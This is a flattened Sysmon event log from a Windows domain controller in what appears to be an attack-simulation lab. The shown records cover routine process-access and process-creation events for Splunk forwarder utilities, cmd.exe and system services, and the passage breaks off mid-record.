AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4328-6000-D800-000000009A01}4940C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D800-000000009A01}4940C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D800-000000009A01}4940C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4328-6000-D700-000000009A01}4932880C:\Windows\system32\cmd.exe{08A6967A-4328-6000-D800-000000009A01}4940C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.858{08A6967A-4328-6000-D800-000000009A01}4940C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4328-6000-D700-000000009A01}4932C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D700-000000009A01}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D700-000000009A01}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.846{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4328-6000-D700-000000009A01}4932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.852{08A6967A-4328-6000-D700-000000009A01}4932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.815{08A6967A-4328-6000-D600-000000009A01}49244892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.580{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D600-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 